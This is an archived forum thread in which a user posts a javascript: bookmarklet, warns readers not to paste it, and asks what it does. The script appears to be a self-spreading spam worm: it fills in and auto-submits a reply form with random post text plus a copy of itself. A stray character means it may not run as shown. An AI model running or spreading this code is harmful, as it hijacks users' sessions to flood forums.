Jump to content

[SOLVED] is this dangerous?


dezkit

Recommended Posts

can somebody tell me what does this script do? DO NOT ACTUALLY COPY AND PASTE THE CODE INTO YOUR BROWSER

 

javascript:with(post){b=document.body.innerHTML; 
if(a=b.match(/res\/[0-9]+/g))
innerHTML+="\x3cinput name=resto value="+a[0].substring(4)+"\x3e"; 
c=document.getElementsByTagName("blockquote"); 
com.value=c[Math.floor(Math.random()*c.length)] 
.innerHTML.match(/[\x0a\x0d\x20-\x7e]+/g)[0]
.replace(/\x3cbr.?\x3e/gi,"\n") .replace(/\x3c.*\x3e/g,"")
+(b.match(/\xad.*?\x7d/g)[0] .replace(/\x3cbr.?\x3e/gi,"\n"))Z;submit()}

Link to comment
https://forums.phpfreaks.com/topic/119166-solved-is-this-dangerous/
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.